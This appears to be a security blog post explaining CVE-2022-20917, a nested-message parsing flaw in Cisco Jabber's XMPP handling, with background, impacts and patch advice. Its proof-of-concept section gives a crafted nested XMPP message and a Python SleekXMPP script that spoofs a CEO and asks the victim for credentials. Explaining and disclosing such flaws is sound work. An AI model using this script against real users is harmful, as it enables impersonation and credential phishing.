In late 2022, Cisco announced CVE-2022-20917, a vulnerability hiding in the way Cisco Jabber, a popular messaging tool, processes XMPP messages. This flaw may sound simple at first, but its real-world impacts are far-reaching—spoofed messages, tricked users, and possibly worse. This post will explain what went wrong, show real code snippets, and walk you through how an attacker could actually exploit this bug.
What is XMPP and Cisco Jabber?
XMPP (Extensible Messaging and Presence Protocol) is an open protocol used for instant messaging. Cisco Jabber is a well-known business chat client, built atop XMPP, for chat, voice, video, and even screen sharing—making it an appealing target.
What’s CVE-2022-20917?
CVE-2022-20917 official advisory is about a weakness in how Jabber processes *nested* XMPP messages. Simply put: Jabber didn’t check carefully enough when messages with certain structures arrived.
If an attacker can control an account and connect to the same XMPP server as their target (which is often easy in organizations), they can send a “specially crafted” message so that Jabber’s client will mishandle the text—possibly showing a lie or acting as if it came from someone else.
The Core Mistake
Jabber missed some key checks when parsing messages containing nested tags. In XMPP, XML is the data language. Here’s what an attacker could craft:
<message from='attacker@example.com' to='victim@example.com'>
<body>
<message from='ceo@example.com' to='victim@example.com'>
<body>You have been promoted! Please click the attached link.</body>
</message>
</body>
</message>
Jabber, failing to distinguish the *inner* message as fake, could incorrectly interpret the contents or attributes, making it seem as though the CEO sent it.
The Root Cause
When Jabber reads the message, it walks through the XML tree but does not properly separate out only the top-level <body> tag. Instead, it might extract body text from an embedded message.
Impersonation: Messages appear to come from a trusted user.
- Phishing: Jabber UI might incorrectly display the sender, so users might click malicious links or send sensitive info.
- Triggering Unsafe Actions: Jabber extensions could be manipulated into responding to crafted content.
Who Can Exploit This?
The attacker *must* be authenticated to the same XMPP server as the victim. In most enterprise environments, this just means having any valid company or partner account.
Proof-of-Concept: Malicious Message Injection
Let’s say an attacker has an account, and their goal is to send a message to a co-worker, but make it *look* like it comes from their boss.
Establish Connection: Connect to the company’s XMPP server using any valid Jabber account.
2. Craft the Nested XMPP Message: Format a message as shown above, with a fake inner <message> tag referring to the boss’ address.
3. Send Message: What Jabber *should* do is ignore the nested message or treat it as normal text, but due to the bug, it will parse and display the inner body as if sent by the boss.
Here’s a simplified Python snippet using SleekXMPP
from sleekxmpp import ClientXMPP
class FakeMsgBot(ClientXMPP):
def __init__(self, jid, password, victim_jid, fake_sender):
super().__init__(jid, password)
self.victim_jid = victim_jid
self.fake_sender = fake_sender
def start(self, event):
nested_msg = (
f"<message from='{self.fake_sender}' to='{self.victim_jid}'>"
f"<body>Urgent: Please reply with your credentials.</body>"
f"</message>"
)
payload = f"<body>{nested_msg}</body>"
self.send_raw(f"<message to='{self.victim_jid}'>{payload}</message>")
self.disconnect()
bot = FakeMsgBot("attacker@example.com", "password123", "victim@example.com", "ceo@example.com")
bot.connect()
bot.process()
*This code will connect as attacker@example.com and send a message with a nested fake message supposedly from the CEO.*
How Can This Be Fixed?
Cisco patched this in later Jabber versions by correctly parsing XMPP messages and ignoring nested <message> tags in the <body>. If you run Cisco Jabber, update to the latest version immediately!
- Cisco Official Patch Info
Patch urgently: Don’t delay, update Jabber.
- Monitor user reports: Train users to spot odd, out-of-character messages—even if they “appear” to come from trusted people.
Conclusion
CVE-2022-20917 is a classic example of how improper input handling—in this case, with nested XML—can lead to much bigger security problems, especially in the trusted environment of internal business messaging apps. Thankfully, the patch is out and simple to apply, but the lesson persists: Always treat parsed input with caution.
For more details:
- NVD entry for CVE-2022-20917
- Cisco Security Advisory
Stay safe, keep your software updated—and always be wary of surprising messages, even when they seem to come from people you trust.
Timeline
Published on: 09/15/2023 03:15:00 UTC
Last modified on: 09/21/2023 14:50:00 UTC